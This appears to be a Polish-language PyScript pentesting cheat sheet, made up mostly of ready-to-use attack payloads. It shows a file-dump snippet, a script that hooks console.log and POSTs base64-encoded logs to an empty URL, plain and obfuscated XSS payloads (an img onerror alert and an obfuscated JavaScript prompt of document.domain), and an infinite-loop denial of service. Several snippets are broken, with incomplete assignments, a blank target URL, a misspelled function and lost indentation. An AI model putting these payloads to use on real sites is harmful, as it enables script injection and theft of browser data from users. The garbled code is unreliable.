Przewodnik po Pentestingu PyScript
PyScript to nowy framework opracowany do integracji Pythona z HTML, dzięki czemu może być używany obok HTML. W tej ściągawce znajdziesz, jak używać PyScript do celów testowania penetracyjnego.
Zrzucanie / Pobieranie plików z wirtualnego systemu plików pamięci Emscripten:
Copy < py-script >
with open('/lib/python3.10/site-packages/_pyodide/', 'r') as fin:
out =
</ py-script >
Copy < py-script >
x = "CyberGuy"
if x == "CyberGuy":
with open('/lib/python3.10/asyncio/') as output:
contents =
print('< script > console .pylog = console .log; console .logs = []; console . log = function (){ console . logs .push ( Array .from (arguments)); console . pylog .apply (console , arguments); fetch ( "" , {method : "POST" , headers : { "Content-Type" : "text/plain;charset=utf-8" } , body : JSON .stringify ({ "content" : btoa ( console .logs)})});}</ script >')
</ py-script >
Cross Site Scripting (Zwykły)
Copy < py - script >
print ( "<img src=x onerror='alert(document.domain)'>" )
</ py - script >
Cross Site Scripting (Python Obfuscated)
Copy < py - script >
sur = "\u0027al" ;fur = "e" ;rt = "rt"
p = "\x22x$$\x22\x29\u0027\x3E"
s = "\x28" ;pic = "\x3Cim" ;pa = "g" ;so = "sr"
e = "c\u003d" ;q = "x"
y = "o" ;m = "ner" ;z = "ror\u003d"
print (pic + pa + " " + so + e + q + " " + y + m + z + sur + fur + rt + s + p)
</ py - script >
Cross Site Scripting (Obfuskacja JavaScriptu)
Copy < py-script >
prinht("<script>var _0x3675bf=_0x5cf5;function _0x5cf5(_0xced4e9,_0x1ae724){var _0x599cad=_0x599c();return _0x5cf5=function(_0x5cf5d2,_0x6f919d){_0x5cf5d2=_0x5cf5d2-0x94;var _0x14caa7=_0x599cad[_0x5cf5d2];return _0x14caa7;},_0x5cf5(_0xced4e9,_0x1ae724);}(function(_0x5ad362,_0x98a567){var _0x459bc5=_0x5cf5,_0x454121=_0x5ad362();while(!![]){try{var _0x168170=-parseInt(_0x459bc5(0x9e))/0x1*(parseInt(_0x459bc5(0x95))/0x2)+parseInt(_0x459bc5(0x97))/0x3*(-parseInt(_0x459bc5(0x9c))/0x4)+-parseInt(_0x459bc5(0x99))/0x5+-parseInt(_0x459bc5(0x9f))/0x6*(parseInt(_0x459bc5(0x9d))/0x7)+-parseInt(_0x459bc5(0x9b))/0x8*(-parseInt(_0x459bc5(0x9a))/0x9)+-parseInt(_0x459bc5(0x94))/0xa+parseInt(_0x459bc5(0x98))/0xb*(parseInt(_0x459bc5(0x96))/0xc);if(_0x168170===_0x98a567)break;else _0x454121['push'](_0x454121['shift']());}catch(_0x5baa73){_0x454121['push'](_0x454121['shift']());}}}(_0x599c,0x28895),prompt(document[_0x3675bf(0xa0)]));function _0x599c(){var _0x34a15f=['15170376Sgmhnu','589203pPKatg','11BaafMZ','445905MAsUXq','432bhVZQo','14792bfmdlY','4FKyEje','92890jvCozd','36031bizdfX','114QrRNWp','domain','3249220MUVofX','18cpppdr'];_0x599c=function(){return _0x34a15f;};return _0x599c();}</script>")
</ py-script >
Atak DoS (Nieskończona pętla)
Copy < py-script >
while True:
print(" ")
</ py-script >